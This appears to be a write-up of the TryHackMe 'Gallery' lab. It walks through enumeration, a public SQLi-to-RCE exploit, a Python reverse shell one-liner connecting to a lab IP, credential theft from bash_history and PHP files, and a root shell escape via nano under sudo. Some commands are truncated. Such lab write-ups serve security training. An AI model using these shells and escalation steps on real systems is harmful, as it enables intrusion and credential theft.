Gallery – Walkthrough En | TryHackMe – Write-up

Try to exploit our image gallery system


Gallery is an easy TryHackme. It’s all classic. Enumeration, find exploit, perform privilege escalation.



Command :

nmap -sV -sC -p-

Web enumeration:

We will use dirsearch on the ports to determine which directories are present.

Command :

dirsearch -u

Command :

dirsearch -u

Simple Image Gallery System.

The /login.php page takes us to an authentication for which we do not know the credentials.


On the other hand, we can see the CMS that is used. The landing page also gives us the version of the CMS. v1.0

Initial foothold

A Google search gives us an exploit available for this CMS. This is an RCE following a bypass of authentication via a SQLi.

Exploitation of the flaw.

You must download the exploit and/or save it in .py format. Then run it with the following command :


On TARGET= you must put the address of the cms.

System Access.

Once the exploit is executed, you must use the address provided by the exploit. From there, it is possible to place system commands as well as a One liner reverse shell.

Python is installed on the system. We can therefore use it to recover a reverse shell.

Command :

python3.6 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((« »,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[« /bin/sh », »-i »]);’

Command with URL :,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.11.38.124%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);[%22/bin/sh%22,%22-i%22]);%27


Lateral movement towards Mike.

After upgrading the shell, you must switch to the user Mike. For this, with the help of, we find in /var/backups/mike_home_backup/ Mike’s identifiers.

Command :

cat .bash_history

Command :

su mike

password : the one found in bash_history

Escalade de privilège.

Once on Mike’s account, you have to do sudo -l . This allows you to see what the user’s privileges are.

Mike has sudo rights to run the application. It is quite possible that one can by this means, to pass root. Before executing it, you have to see what is in the script.

Command :

cat /opt/

It is possible to do several things with this script. Check the version, do an update but also read the report with the read option which will open the report.txt file with nano.

Since the command will be launched with sudo rights, it will be possible once the file is opened with nano, to exit nano with a root shell. All this is shown on the well-known site

Command :

sudo /bin/bash /opt/

Error ?

It is possible to have this error:  Error opening terminal: unknown.


To avoid this error, run this command :

export TERM=screen

Once the report is opened with nano, you must run these commands:

crtl + r  puis ctrl x

This allows you to execute system commands. Then you have to put your last two commands to become root.

reset ; sh 1>&0 2>&0

How to get the hash of the admin account.

Command :

find / -maxdepth 8 -name *.php -type f 2>/dev/null | xargs grep -C 20 -i pass

To learn more about the find command for can watch this article

Once the identifiers have been retrieved, you must connect to the mysql server

Commande :

mysql -u gallery_user -p

Then you have to do these commands : 

show databases;

use gallery_db

show tables;

select * from users;


That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article.